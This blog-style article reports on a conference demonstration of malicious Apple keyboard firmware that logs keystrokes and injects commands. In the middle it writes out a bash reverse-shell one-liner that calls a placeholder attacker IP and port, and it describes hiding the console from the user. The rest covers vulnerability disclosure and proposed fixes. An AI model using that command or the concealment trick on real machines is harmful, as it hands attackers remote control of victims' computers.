Apple keyboards hacked and possessed
If the bad news about all the new critical iPhone and Mac OS X vulnerabilities announced at BlackHat 2009 weren’t bad enough, there now appears to be a new vulnerability in Apple’s hardware. This type of a hack however isn’t something where you can go into an Apple store and have an Apple “genius” exorcise because once the Apple keyboard is infected and locked; there is no practical way of undoing the damage.
I got a chance to interview the security researcher at DEFCON 2009 (another security conference immediately following BlackHat) who discovered this flaw. The researcher explained that he goes by the name “K. Chen” because he feared harassment from staunch Apple fans who actually believe those Mac versus PC security commercials. In the video below, I had Mr. Chen demonstrate his possessed keyboard on my computer which had no special software installed. The keyboard would actually spit out in reverse order what had been typed into it whenever the ENTER key was pressed. This showed that the keyboard was indeed modified with special firmware which can record what was typed and inject it back into the host computer. This key logging capability can even work during the boot phase which would unlock additional hardware encryption features.
Once this keyboard is possessed by an attacker, the keyboard can easily fire up a bash connect back shell by launching a console and feeding in the following characters:
exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0
This would instantly connect the computer to the attacker’s computer and instantly give the attacker full control of the computer at which point additional rootkits could be installed. While this process would be visible to the human user while it’s happening, that risk would be minimized by waiting through an hour of no keyboard inactivity and a simple “Open Apple + M” key stroke would minimize the console shell hiding its actions further.
What all this basically means is that this keyboard can betray any computer it attaches to by:
- Recording your password keystrokes
- Deliver your computer into the attacker’s hands
- Re-infect your computer if your computer’s hard drive was completely wiped
To infect your keyboard, the attacker only needs to exploit one of the many weaknesses in Mac OS X and Apple applications. Once exploited, the attacker only needs to drop less than 100 KB of payload to infect the keyboard and the attack takes less than 18 seconds.
This type of attack which is resilient against a full hard drive wipe is considered the holy grail of computer hacking because the hardware has been infected. Once the Apple keyboard (USB or BlueTooth) is infected, it is extremely difficult to detect and the only practical way to get rid of the infection is to throw away the keyboard.
Mr. Chen also explained that he had been working with Apple to come up with a solution, but that he feared Apple may be selecting the weaker fix by only blocking future revisions of Mac OS X from infecting the keyboard. This would not prevent the keyboard from being hacked by another computer running something other than the latest version of Mac OS X nor does it guarantee that a patched Mac OS X computer can’t bypass the proposed protections. The cleaner solution Mr. Chen is proposing is that Apple should simply lock the Keyboard firmware from any future modifications since the keyboard doesn’t implement any digital signature protection.
I asked Mr. Chen why Apple would leave the firmware open and he explained that Apple had a tendency to rush hardware to market which has resulted in shipped keyboards with flaws that needed firmware updates. But because the keyboards are already more mature today; perhaps it wouldn’t be a bad idea for Apple to lock in the firmware. I then asked Mr. Chen if he could produce a utility for consumers to lock their own keyboards and he said yes, but he would rather wait for Apple’s finalized solution first. If the Apple solution is inadequate, then he might revisit the possibility of producing a keyboard firmware locking utility. Until such time, buyers considering Apple keyboards have been warned.
K.Chen has released a 190 page deck of slides that details how all of this is done. That and all the other BlackHat 2009 slides and papers can be found here.